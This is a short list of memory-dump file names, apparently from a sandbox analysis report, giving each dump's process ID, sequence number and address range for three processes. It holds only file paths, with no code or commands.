                                            memory/1932-86-0x000001BD228A0000-0x000001BD2292A000-memory.dmp

                                            memory/1932-88-0x000001BD228A0000-0x000001BD2292A000-memory.dmp

                                            memory/1932-59-0x00007FF8A09F0000-0x00007FF8A0F0E000-memory.dmp

                                            memory/1932-87-0x000001BD228A0000-0x000001BD2292A000-memory.dmp

                                            memory/1932-58-0x00007FF8C2330000-0x00007FF8C2332000-memory.dmp

                                            memory/1932-91-0x000001BD23460000-0x000001BD23D1E000-memory.dmp

                                            memory/1932-93-0x000001BD23460000-0x000001BD23D1E000-memory.dmp

                                            memory/1932-94-0x000001BD23460000-0x000001BD23D1E000-memory.dmp

                                            memory/1932-78-0x000001BD23460000-0x000001BD23D1E000-memory.dmp

                                            memory/1932-74-0x000001BD23460000-0x000001BD23D1E000-memory.dmp

                                            memory/1932-67-0x000001BD23460000-0x000001BD23D1E000-memory.dmp

                                            memory/1932-73-0x000001BD23460000-0x000001BD23D1E000-memory.dmp

                                            memory/1932-72-0x000001BD23460000-0x000001BD23D1E000-memory.dmp

                                            memory/1932-71-0x000001BD23460000-0x000001BD23D1E000-memory.dmp

                                            memory/4236-245-0x0000000001240000-0x0000000001241000-memory.dmp

                                            memory/4236-247-0x00000000747C0000-0x0000000074F0A000-memory.dmp

                                            memory/4792-114-0x00000255C1420000-0x00000255C143E000-memory.dmp

                                            memory/4792-111-0x00000255C13F0000-0x00000255C1412000-memory.dmp

                                            memory/4792-118-0x00000255C1440000-0x00000255C144A000-memory.dmp

                                            memory/4792-115-0x00000255D9990000-0x00000255D9A42000-memory.dmp